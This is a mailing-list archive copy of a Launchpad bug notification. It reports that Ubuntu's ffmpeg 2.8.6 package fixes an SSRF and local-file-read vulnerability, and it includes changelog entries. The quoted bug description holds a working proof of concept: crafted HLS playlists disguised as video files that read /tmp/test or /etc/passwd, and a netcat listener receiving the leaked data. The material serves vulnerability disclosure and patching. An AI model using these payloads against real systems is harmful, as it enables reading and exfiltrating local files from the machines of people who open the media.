group.of.nepali.translators team mailing list archive

Thread
Date
[Bug 1533367] Re: ffmpeg allows Server-Side Request Forgery attack

To: group.of.nepali.translators@xxxxxxxxxxxxxxxxxxx
From: Launchpad Bug Tracker <1533367@xxxxxxxxxxxxxxxxxx>
Date: Thu, 25 Feb 2016 19:31:36 -0000
Reply-to: Bug 1533367 <1533367@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx
This bug was fixed in the package ffmpeg - 7:2.8.6-1ubuntu1

---------------
ffmpeg (7:2.8.6-1ubuntu1) xenial; urgency=low

  * Merge from Debian unstable.  Remaining changes:
    - Compile with -O2 rather than -O3 on s390x, to work around
      https://bugs.launchpad.net/bugs/1526324.
  * Should fix LP: #1533367

ffmpeg (7:2.8.6-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.6.
  * Update Standards-Version to 3.9.7.
     - Move documentatation from /u/s/d/ffmpeg-doc/ to /u/s/d/ffmpeg/.
  * Use https for the Vcs-Git link.

ffmpeg (7:2.8.5-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898.
  * Update doc-make-apidoc-output-independent-of-SRC_PATH.patch.
  * Add patch to make out-of-tree builds bit-identical to in-tree-builds.
  * Enable the now available opencv and frei0r on mips64el.
  * Fix altivec-extra compile time optimization.
  * Update copyright year for the debian files.
  * Change priority of libavcodec*-extra* to extra.

 -- Iain Lane <iain@xxxxxxxxxxxxxxxxxxx>  Thu, 25 Feb 2016 17:48:20
+0000

** Changed in: ffmpeg (Ubuntu Xenial)
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1533367

Title:
  ffmpeg allows Server-Side Request Forgery attack

Status in ffmpeg package in Ubuntu:
  Fix Released
Status in ffmpeg source package in Vivid:
  Fix Released
Status in ffmpeg source package in Wily:
  Fix Released
Status in ffmpeg source package in Xenial:
  Fix Released

Bug description:
  There is a russian blog post about SSRF and local file read with ffmpeg:
  http://habrahabr.ru/company/mailru/blog/274855/

  One of variants:
  $ cat  /tmp/test.m3u8 
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:,
  http://localhost:8080?

  (Last line - http://* without \n)

  $ cat /tmp/test.avi 
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:10.0,
  concat:file:///tmp/test.m3u8|file:///tmp/test
  #EXT-X-ENDLIST

  $ cat /tmp/test
  qwerty
  123456

  Open test.avi with smplayer or even kde baloo:

  $ nc -v -l 8080
  Listening on [0.0.0.0] (family 0, port 8080)
  Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
  GET ?qwerty HTTP/1.1
  User-Agent: Lavf/56.1.0
  Accept: */*
  Range: bytes=0-
  Connection: close
  Host: localhost:8080
  Icy-MetaData: 1

  Localhost and local test.m3u8 can be changed to remote server.
  File extension does not matter.

  There is another attack with tumbmails:
  $ cat header.y4m
  YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
  FRAME

  $ cat video.mp4
  #EXTM3U
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:10.0,
  concat:http://example.org/header.y4m|file:///etc/passwd
  #EXT-X-ENDLIST

  $ ffmpeg -i video.mp4 thumbnail.png
  $ ffmpeg -i thumbnail.png out.y4m
  $ cat out.y4m
  YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
  FRAME
  # $FreeBSD: release/10.0.0/etc/master.passwd 256366
  ,! 2013-10-12 06:08:18Z rpaulo $
  #
  root:*:0:0:Charlie &:/root:/usr/local/bin/zsh
  toor:*:0:0:Bourne-again Superuser:/root:

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ffmpeg/+bug/1533367/+subscriptions